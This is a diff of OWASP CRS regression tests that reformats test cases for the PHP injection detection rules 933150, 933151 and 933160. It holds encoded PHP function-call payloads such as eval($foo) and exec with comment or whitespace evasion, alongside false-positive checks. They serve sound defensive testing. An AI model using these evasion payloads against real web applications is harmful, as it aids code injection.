+ method: GET + port: 80 + uri: "/get?foo=the%20files%20%28yep%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 22 desc: | False Positive test, exec should be followed by parenthesis payload: exec ( stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%28" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%28" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 23 desc: | False Positive test payload: executor() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=executor%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=executor%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 24 desc: | False Positive test payload: cheval($foo) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=cheval%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=cheval%28%24foo%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 25 desc: | False Positive test payload: audiofile($foo) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=audi%6ffile%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=audi%6ffile%28%24foo%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 26 desc: | False Positive test payload: the system is down() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20system%20is%20down%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20system%20is%20down%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 27 desc: | False Positive test payload: ecosystem() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ecosystem%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ecosystem%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 28 desc: | False Positive test, function doesn't exist payload: systems() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=systems%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=systems%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 29 desc: | False Positive test, function doesn't exist payload: system something() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=system%20something%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - - test_title: 933150-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=system%20something%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 30 desc: "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?a=preview" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?a=preview" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 31 desc: "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?a=exploration" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?a=exploration" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 32 desc: | PHP mixed case function call with space, LF between (). payload: file_ExistS (\n\n) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=file_ExistS%20%28%0A%0A%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=file_ExistS%20%28%0A%0A%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 33 desc: | PHP function call with multiple whitespaces. payload: fopen (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=fopen%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=fopen%20%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index a7e7303d5..06ebd3a85 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml @@ -1,136 +1,134 @@ --- meta: author: "lifeforms, ssigwart, azurit" - description: None - enabled: true - name: 933151.yaml +rule_id: 933151 tests: - - test_title: 933151-1 + - test_id: 1 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/array_diff%20%28" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/array_diff%20%28" + version: "HTTP/1.1" + output: + log: + expect_ids: [933151] + - test_id: 2 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?date_ADD%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?date_ADD%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933151] + - test_id: 3 desc: "non-dangerous PHP functions, removed to reduce FP" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=filemtime%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=filemtime%28%24foo%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] + - test_id: 4 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "gethostbynamE(" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "gethostbynamE(" + version: "HTTP/1.1" + output: + log: + expect_ids: [933151] + - test_id: 5 desc: "No parenthesis after keyword" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=array_diff" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=array_diff" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] + - test_id: 6 desc: "rule should not trigger when there are other words before parenthesis" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=ceiling%20height(9ft)" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=ceiling%20height(9ft)" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] + - test_id: 7 desc: "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=preview" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=preview" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] + - test_id: 8 desc: "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=exploration" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=exploration" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933151] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index c3c835a35..8c561628e 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml @@ -1,680 +1,678 @@ --- meta: author: "lifeforms, Franziska Bühler, Max Leske, azurit" - description: None - enabled: true - name: 933160.yaml +rule_id: 933160 tests: - - test_title: 933160-1 + - test_id: 1 desc: | PHP function call in query. payload: chr(123) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=chr%28123%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=chr%28123%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 2 desc: | PHP function call with variable as parameter. payload: eval($foo) stages: - - stage: - input: - data: eval($foo) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-3 + - input: + data: eval($foo) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 3 desc: | PHP function call, CR, ($variable). payload: eval\r($foo) stages: - - stage: - input: - data: eval%0D%28%24foo%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-4 + - input: + data: eval%0D%28%24foo%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 4 desc: | PHP function call, LF, ('value'). payload: exec\n('bar') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%0A%28%27bar%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%0A%28%27bar%27%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 5 desc: | PHP uppercase function call, CR, LF, (). payload: FILE\r\n() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FILE%0D%0A%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FILE%0D%0A%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 6 desc: | PHP function call with multiple whitespaces. payload: exec (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 7 desc: | PHP function call using Error Control Operator. payload: @exec('test') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=%40exec%28%27test%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=%40exec%28%27test%27%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 8 desc: | PHP function call with vertical tab. payload: exec (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%09%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%09%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 9 desc: | PHP function call with comment and newline. payload: exec //comment\r\n (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 10 desc: | PHP function call with comment and newline. payload: exec #comment\r\n (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 11 desc: | PHP function call with comment and newline. payload: exec#\n () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%23%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%23%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 12 desc: | PHP function call with comment, newline, and vertical tab. payload: exec \t #\n () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%09%20%23%0a%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%09%20%23%0a%20%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 13 desc: | PHP function call with c-style comment syntax. payload: exec/*comment*/() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 14 desc: | PHP function call with c-style comment syntax and whitespaces. payload: exec /*comment*/ () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 15 desc: | PHP function call with empry c-style comment syntax, whitespaces, and vertical tab. payload: exec \t/**/\t () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 16 desc: | PHP function call with c-style comment syntax containing newline, whitespaces and vertical tab. payload: exec\t/*foo\r\nbar*/\t () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 